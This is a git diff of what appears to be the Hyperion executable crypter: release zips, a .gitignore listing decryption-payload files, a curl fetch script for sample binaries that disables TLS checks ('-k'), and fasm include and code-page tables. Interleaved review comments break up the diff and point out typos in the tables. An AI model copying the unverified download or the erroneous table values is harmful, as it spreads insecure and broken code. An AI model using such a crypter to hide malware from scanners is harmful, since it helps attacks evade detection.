Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.2.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.3.1.zip b/binary/hyperion/release/Hyperion-2.3.1.zip
new file mode 100644
index 0000000..401e28c
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.3.1.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.3.zip b/binary/hyperion/release/Hyperion-2.3.zip
new file mode 100644
index 0000000..0175b32
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.3.zip differ
diff --git a/binary/hyperion/source/.gitignore b/binary/hyperion/source/.gitignore
new file mode 100644
index 0000000..4fcf731
--- /dev/null
+++ b/binary/hyperion/source/.gitignore
@@ -0,0 +1,21 @@
+Src/Container/64/decryption_payload.asm
+Src/Container/64/image_base.inc
+Src/Container/64/image_size.inc
+Src/Container/64/infile_array.inc
+Src/Container/64/infile_size.inc
+Src/Container/64/key_size.inc
+Src/Container/64/logfile_select.asm
+Src/Container/64/main_prolog.inc
+Src/Container/32/decryption_payload.asm
+Src/Container/32/image_base.inc
+Src/Container/32/image_size.inc
+Src/Container/32/infile_array.inc
+Src/Container/32/infile_size.inc
+Src/Container/32/key_size.inc
+Src/Container/32/logfile_select.asm
+Src/Container/32/main_prolog.inc
+Src/Crypter/*.o
+Src/Payloads/Aes/c/*.o
+hyperion.exe
+log.txt
+*.exe
diff --git a/binary/hyperion/source/Examples/fetch_binaries.sh b/binary/hyperion/source/Examples/fetch_binaries.sh
new file mode 100755
index 0000000..b75c727
--- /dev/null
+++ b/binary/hyperion/source/Examples/fetch_binaries.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
+set -e
+curl https://www.dropbox.com/s/6bbtntpywxm0wz0/example_binaries.tar.gz?dl=1 -o examples.tar.gz -J -L -k
+gzip -d examples.tar.gz
+tar -xvf examples.tar
+rm examples.tar
diff --git a/binary/hyperion/source/Examples/helloworld.exe b/binary/hyperion/source/Examples/helloworld.exe
deleted file mode 100644
index 9c66691..0000000
Binary files a/binary/hyperion/source/Examples/helloworld.exe and /dev/null differ
diff --git a/binary/hyperion/source/Examples/readme.txt b/binary/hyperion/source/Examples/readme.txt
new file mode 100644
index 0000000..95517ee
--- /dev/null
+++ b/binary/hyperion/source/Examples/readme.txt
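Review bot: The `curl` line in fetch_binaries.sh passes `-k`, which turns off TLS certificate verification for a download of executables the accompanying readme tells users to feed to hyperion, so anyone able to interpose on the connection could hand back a different archive without the script noticing. The URL is already HTTPS and the host is expected to present a valid certificate, so `-k` should simply be dropped rather than worked around. The script also extracts whatever arrived without checking it; recording the archive's digest and verifying it before `gzip -d`, e.g. `echo '<EXPECTED_SHA256>  examples.tar.gz' | sha256sum -c -`, makes the fetch tamper-evident, and the existing `set -e` already aborts the script if that check fails.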
@@ -0,0 +1,16 @@ +Please use "fetch_binaries.sh" to download +several test executables which can be encrypted +with hyperion: + +- helloworld_gui_asm.exe: 32 bit, opens MessageBoxA, + written with fasm +- helloworld64_gui_asm.exe: 64 bit, opens MessageBoxA, + written with fasm +- helloworld_cmd.exe: 32 bit, hello world printf, + written in C, build with mingw +- helloworld64_cmd.exe: 64 bit, hello world printf, + written in C, build with mingw +- gui_mingw.exe: 32 bit, opens a window, contains menu + as ressource, build with mingw +- gui64_visualstudio.exe: 64 bit, opens a window, contains menu + as ressource, build with visualstudio diff --git a/binary/hyperion/source/Fasm/fasminclude/API/ADVAPI32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/ADVAPI32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/API/ADVAPI32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/ADVAPI32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/API/COMCTL32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/COMCTL32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/API/COMCTL32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/COMCTL32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/API/COMDLG32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/COMDLG32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/API/COMDLG32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/COMDLG32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/API/GDI32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/GDI32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/API/GDI32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/GDI32.INC 
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/KERNEL32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/KERNEL32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/API/KERNEL32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/KERNEL32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/API/SHELL32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/SHELL32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/API/SHELL32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/SHELL32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/API/USER32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/USER32.INC old mode 100644 new mode 100755 similarity index 97% rename from binary/hyperion/source/Fasm/fasminclude/API/USER32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/USER32.INC index 7c63e7d..750b2dd --- a/binary/hyperion/source/Fasm/fasminclude/API/USER32.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/API/USER32.INC @@ -326,6 +326,8 @@ import user32,\ GetWindowInfo,'GetWindowInfo',\ GetWindowLongA,'GetWindowLongA',\ GetWindowLongW,'GetWindowLongW',\ + GetWindowLongPtrA,'GetWindowLongPtrA',\ + GetWindowLongPtrW,'GetWindowLongPtrW',\ GetWindowModuleFileNameA,'GetWindowModuleFileNameA',\ GetWindowModuleFileNameW,'GetWindowModuleFileNameW',\ GetWindowPlacement,'GetWindowPlacement',\ diff --git a/binary/hyperion/source/Fasm/fasminclude/API/WSOCK32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/WSOCK32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/API/WSOCK32.INC rename to binary/hyperion/source/Fasm/INCLUDE/API/WSOCK32.INC 
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/UTF8.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/UTF8.INC old mode 100644 new mode 100755 similarity index 64% rename from binary/hyperion/source/Fasm/fasminclude/ENCODING/UTF8.INC rename to binary/hyperion/source/Fasm/INCLUDE/ENCODING/UTF8.INC index c544c90..fb4f1ed --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/UTF8.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/UTF8.INC 
@@ -2,68 +2,66 @@ ; UTF-8 macro du [arg] - { local current,char + { local current,..input,char if arg eqtype '' virtual at 0 + ..input:: db arg count = $ end virtual current = 0 while current < count - virtual at 0 - db arg - load char byte from current + load char byte from ..input:current wide = char current = current + 1 if char > 0C0h if char < 0E0h wide = char and 11111b - load char byte from current + load char byte from ..input:current wide = wide shl 6 + (char and 111111b) current = current + 1 else if char < 0F0h wide = char and 1111b - load char byte from current + load char byte from ..input:current wide = wide shl 6 + (char and 111111b) - load char byte from current+1 + load char byte from ..input:current+1 wide = wide shl 6 + (char and 111111b) current = current + 2 else if char < 0F8h wide = char and 111b - load char byte from current + load char byte from ..input:current wide = wide shl 6 + (char and 111111b) - load char byte from current+1 + load char byte from ..input:current+1 wide = wide shl 6 + (char and 111111b) - load char byte from current+2 + load char byte from ..input:current+2 wide = wide shl 6 + (char and 111111b) current = current + 3 else if char < 0FCh wide = char and 11b - load char byte from current + load char byte from ..input:current wide = wide shl 6 + (char and 111111b) - load char byte from current+1 + load char byte from ..input:current+1 wide = wide shl 6 + (char and 111111b) - load char byte from current+2 + load char byte from ..input:current+2 wide = wide shl 6 + (char and 111111b) - load char byte from current+3 + load char byte from ..input:current+3 wide = wide shl 6 + (char and 111111b) current = current + 4 else wide = char and 1 - load char byte from current + load char byte from ..input:current wide = wide shl 6 + (char and 111111b) - load char byte from current+1 + load char byte from ..input:current+1 wide = wide shl 6 + (char and 111111b) - load char byte from current+2 + load char byte from ..input:current+2 
wide = wide shl 6 + (char and 111111b) - load char byte from current+3 + load char byte from ..input:current+3 wide = wide shl 6 + (char and 111111b) - load char byte from current+4 + load char byte from ..input:current+4 wide = wide shl 6 + (char and 111111b) current = current + 5 end if end if - end virtual if wide < 10000h dw wide else
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1250.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1250.INC
new file mode 100755
index 0000000..6769061
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1250.INC
@@ -0,0 +1,36 @@
+
+; Windows 1250
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h
+ dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah
+ dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh
+ dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch
+ dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh
+ dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh
+ dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh
+ dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1251.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1251.INC
new file mode 100755
index 0000000..95d0da8
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1251.INC
@@ -0,0 +1,33 @@
+
+; Windows 1251
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 401h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh
+ dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh
+ dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h
+ dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h
+ times 40h dw 410h+%-1
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1252.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1252.INC
new file mode 100755
index 0000000..73fac54
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1252.INC
@@ -0,0 +1,31 @@
+
+; Windows 1252
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17D,?
+ dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h
+ times 60h dw 0A0h+%-1
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
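Review bot: In the WIN1252 table the entry for byte 8Eh (fifteenth value of the first `dw` row) is written `17D` instead of `17Dh`; without the `h` suffix fasm does not read it as hex, so the mapping for that code point assembles to a small decimal constant rather than 017Dh, and any string passed through this file's `du` macro that contains byte 8Eh gets a wrong UTF-16 unit. The sibling WIN1250 table in this same commit spells the same code point `17Dh`. The row should end `...,152h,?,17Dh,?`.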
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1253.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1253.INC
new file mode 100755
index 0000000..8941f8d
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1253.INC
@@ -0,0 +1,33 @@
+
+; Windows 1253
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,?
+ dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,?
+ dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h
+ dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,288h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh
+ times 40h dw 390h+%-1
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1254.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1254.INC
new file mode 100755
index 0000000..bf862ab
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1254.INC
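Review bot: In the WIN1253 table the value for byte B8h (ninth entry of the fourth `dw` row) is `288h`, which breaks the 38xh run of its neighbours (`384h` before it, `389h,38Ah` after it) and looks like a typo for `388h`; the `du` macro would then emit U+0288 instead of the Greek capital with tonos for that byte. This is inferred from the surrounding values, so verify against the code-page table before changing the row to `...,0B7h,388h,389h,38Ah,...`.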
@@ -0,0 +1,34 @@
+
+; Windows 1254
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,?
+ dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h
+ times 30h dw 0A0h+%-1
+ dw 11Eh,0D1h,0D2h,0D3h,0D4h,0D5h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,130h,15Eh,0DFh
+ times 10h dw 0E0h+%-1
+ dw 11Fh,0F1h,0F2h,0F3h,0F4h,0F5h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,131h,15Fh,0FFh
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1255.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1255.INC
new file mode 100755
index 0000000..77618d7
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1255.INC
@@ -0,0 +1,36 @@
+
+; Windows 1255
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,?
+ dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,?
+ dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh
+ dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh
+ dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh
+ dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,?
+ dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh
+ dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,?
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1256.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1256.INC
new file mode 100755
index 0000000..6634f78
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1256.INC
@@ -0,0 +1,36 @@
+
+; Windows 1256
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h
+ dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh
+ dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh
+ dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
+ dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh
+ dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h
+ dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh
+ dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1257.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1257.INC
new file mode 100755
index 0000000..e4f9a41
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1257.INC
@@ -0,0 +1,36 @@
+
+; Windows 1257
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h
+ dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,?
+ dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h
+ dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h
+ dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh
+ dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh
+ dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch
+ dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1258.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1258.INC
new file mode 100755
index 0000000..e524748
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1258.INC
@@ -0,0 +1,36 @@
+
+; Windows 1258
+
+rept 1 { local ..encoding
+ __encoding equ ..encoding }
+
+virtual at 0
+ __encoding::
+ times 80h dw %-1
+ dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,?
+ dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h
+ dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh
+ dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
+ dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh
+ dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh
+ dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh
+ dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh
+end virtual
+
+macro du [arg]
+ { local offset,char
+ offset = $-$$
+ du arg
+ if arg eqtype ''
+ repeat ($-offset-$$)/2
+ load char byte from $$+offset+(%-1)*2
+ if char > 7Fh
+ load char word from __encoding:char*2
+ store word char at $$+offset+(%-1)*2
+ end if
+ end repeat
+ end if }
+
+struc du [args]
+ { common label . word
+ du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN874.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN874.INC
new file mode 100755
index 0000000..5b7833c
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN874.INC
@@ -0,0 +1,31 @@ + +; Windows 874 + +rept 1 { local ..encoding + __encoding equ ..encoding } + +virtual at 0 + __encoding:: + times 80h dw %-1 + dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,? + dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,? + times 60h dw 0E00h+%-1 +end virtual + +macro du [arg] + { local offset,char + offset = $-$$ + du arg + if arg eqtype '' + repeat ($-offset-$$)/2 + load char byte from $$+offset+(%-1)*2 + if char > 7Fh + load char word from __encoding:char*2 + store word char at $$+offset+(%-1)*2 + end if + end repeat + end if } + +struc du [args] + { common label . word + du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL32.INC old mode 100644 new mode 100755 similarity index 95% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL32.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL32.INC index 56ce029..e275196 --- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL32.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL32.INC @@ -133,7 +133,7 @@ struct TOOLINFO uFlags dd ? hwnd dd ? uId dd ? - Rect RECT + rect RECT hInst dd ? lpszText dd ? ends diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL64.INC old mode 100644 new mode 100755 similarity index 95% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL64.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL64.INC index db6dbf0..9c76662 --- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL64.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL64.INC @@ -68,8 +68,8 @@ struct TBBUTTON idCommand dd ? fsState db ? fsStyle db ?,6 dup ? - dwData dd ? - iString dd ? + dwData dq ? + iString dq ? ends struct COLORMAP 
@@ -128,14 +128,15 @@ struct REBARBANDINFO ends struct TOOLINFO - cbSize dd ? - uFlags dd ? - hwnd dq ? - uId dd ? - Rect RECT - dd ? - hInst dq ? - lpszText dq ? + cbSize dd ? + uFlags dd ? + hwnd dq ? + uId dq ? + rect RECT + hInst dq ? + lpszText dq ? + lParam dq ? + lpReserved dq ? ends struct TTHITTESTINFO diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG32.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG64.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG64.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG64.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/GDI32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/GDI32.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI32.INC diff --git a/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI64.INC new file mode 100755 index 0000000..f311353 --- /dev/null +++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI64.INC 
